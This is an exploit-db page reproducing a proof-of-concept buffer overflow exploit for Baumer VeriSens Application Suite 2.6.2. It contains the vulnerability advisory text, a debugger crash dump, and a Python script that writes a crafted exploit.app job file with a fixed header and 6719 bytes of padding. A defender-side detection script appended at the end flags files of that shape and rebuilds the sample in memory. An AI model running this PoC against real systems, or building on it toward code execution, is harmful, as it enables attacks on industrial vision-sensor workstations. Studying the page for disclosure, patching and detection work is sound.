Baumer VeriSens Application Suite 2.6.2 – Buffer Overflow (PoC)

  • Author: LiquidWorm
  • Date: 2016-02-03
  • Category:
  • Platform:
  • Source: https://www.exploit-db.com/exploits/39403/
#!/usr/bin/env python
#
#
# Baumer VeriSens Application Suite 2.6.2 Buffer Overflow Vulnerability
#
#
# Vendor: Baumer Holding AG | Baumer Optronic GmbH
# Product web page: http://www.baumer.com
# Software link: http://www.baumer.com/us-en/products/identification-image-processing/software-and-starter-kits/verisens-application-suite/
# Affected version: 2.6.2 (ID-CS-XF-XC)
#
# Summary: The Baumer Application Suite is the intuitive configuration
# software for VeriSens vision sensors, which makes it quick and simple
# for even new users to implement image processing tasks. Starting with
# the creation of test tasks through to the management of jobs, the program
# will take you through just a few steps to reach your goal.
#
# Desc: The vulnerability is caused by a boundary error in the baselibs.dll
# library when processing a device job file, which can be exploited to cause
# a buffer overflow when a user opens e.g. a specially crafted .APP file.
# Successful exploitation could allow execution of arbitrary code on the
# affected machine.
#
# -------------------------------------------------------------------------
# (78c.cb0): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# Exported symbols for C:\Program Files (x86)\Baumer\VeriSens Application Suite v2.6.2\AppSuite\baselibs.dll - 
# eax=4d81ab45 ebx=4d81ab45 ecx=41414141 edx=41414141 esi=4d81ab45 edi=0c17e010
# eip=56bc4186 esp=0040a020 ebp=0040a020 iopl=0         nv up ei pl nz na po nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
# baselibs!b_Int_restore+0x6:
# 56bc4186 8b00            mov     eax,dword ptr [eax]  ds:002b:4d81ab45=????????
# 0:000> u
# baselibs!b_Int_restore+0x6:
# 56bc4186 8b00            mov     eax,dword ptr [eax]
# 56bc4188 8bc8            mov     ecx,eax
# 56bc418a 8bd0            mov     edx,eax
# 56bc418c c1ea18          shr     edx,18h
# 56bc418f c1f908          sar     ecx,8
# 56bc4192 81e100ff0000    and     ecx,0FF00h
# 56bc4198 0bca            or      ecx,edx
# 56bc419a 8bd0            mov     edx,eax
# 0:000> dds
# 56bc6b86  00107d80
# 56bc6b8a  8b117457
# 56bc6b8e  f0e181cb
# 56bc6b92  e8000000
# 56bc6b96  fffff9e6
# 56bc6b9a  02ebf88b
# 56bc6b9e  ff85fa8b
# 56bc6ba6  68000001
# 56bc6baa  56c2afa4 baselibs!VsInfoFeed::Listener::`vftable'+0xb154
# 56bc6bae  3f8ce857
# 56bc6bb2  c483ffff
# 56bc6bb6  75c0850c USER32!SetKeyboardState+0x705a
# 56bc6bba  325b5f07
# -------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
#            Microsoft Windows 7 Ultimate SP1 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2016-5303
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5303.php
#
#
# 14.11.2015
#

# Fixed job-file prefix written before the padding (bytes literal so the
# raw values survive on both Python 2 and 3)
header = (b"\x00\x00\x00\x01\x00\x00\x00\x04\x95\xCF\x82\xF6\x00\x00\x00"
          b"\x01\x00\x00\x00\x04\x00\x00\x00\x2B\x00\x00\x00\x50\x00\x00"
          b" \x00\x05\x43\x6F\x64\x65\x00\x00\x00\x00\x50\x00\x00\x00\x01"
          b"\x00\x00\x00\x00\x50\x00\x00\x00")  # \x0F

# 6719 bytes of padding followed by a four-byte marker
buffer = b"\x41" * 6719 + b"\x42\x42\x42\x42"

# Binary mode so no byte is altered on write; the trailing \x0F closes the file
with open("exploit.app", "wb") as f:
    f.write(header + buffer + b"\x0F")
print("File exploit.app created!\n")

#
# PoC: http://www.zeroscience.mk/codes/bvas-5303.app.zip
#      https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39403.zip
#
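A defender-side check, added here and not part of the advisory, the PoC script above or the vendor's software: it flags a job file that starts with the PoC's fixed header (copied from the script) and is followed by an abnormally long run of a single byte value, which is the shape of the crafted file rather than of a real job. The run threshold MAX_RUN and the function names are assumptions; the .APP format itself is not parsed because the page does not document it.

```python
import re
from typing import Optional

# Fixed 56-byte prefix the PoC on this page writes before the padding
# (copied from the exploit's `header`); used here only as a signature.
POC_HEADER = (b"\x00\x00\x00\x01\x00\x00\x00\x04\x95\xCF\x82\xF6\x00\x00\x00"
              b"\x01\x00\x00\x00\x04\x00\x00\x00\x2B\x00\x00\x00\x50\x00\x00"
              b" \x00\x05\x43\x6F\x64\x65\x00\x00\x00\x00\x50\x00\x00\x00\x01"
              b"\x00\x00\x00\x00\x50\x00\x00\x00")

# Threshold is an assumption: a job file body consisting of one repeated
# byte value for this long has no legitimate reason to exist.
MAX_RUN = 1024


def longest_byte_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte value in `data`."""
    best = 0
    for m in re.finditer(rb"(.)\1*", data, re.DOTALL):
        best = max(best, m.end() - m.start())
    return best


def assess_app_file(data: bytes) -> Optional[str]:
    """Return a reason string if the blob looks like the PoC file, else None."""
    if data.startswith(POC_HEADER):
        body = data[len(POC_HEADER):]
        if body.endswith(b"\x0F"):          # trailing terminator the PoC appends
            body = body[:-1]
        run = longest_byte_run(body)
        if run >= MAX_RUN:
            return "PoC header followed by a %d-byte run of one byte value" % run
    run = longest_byte_run(data)
    if run >= MAX_RUN:
        return "%d-byte run of a single byte value" % run
    return None


def build_poc_like_sample() -> bytes:
    """Constructed sample mirroring the PoC layout (built in memory, not read from disk)."""
    return POC_HEADER + b"A" * 6719 + b"BBBB" + b"\x0F"
```

On a real file, read it with `open(path, "rb").read()` and pass the bytes to `assess_app_file`; a `None` result only means this heuristic saw nothing, not that the file is safe.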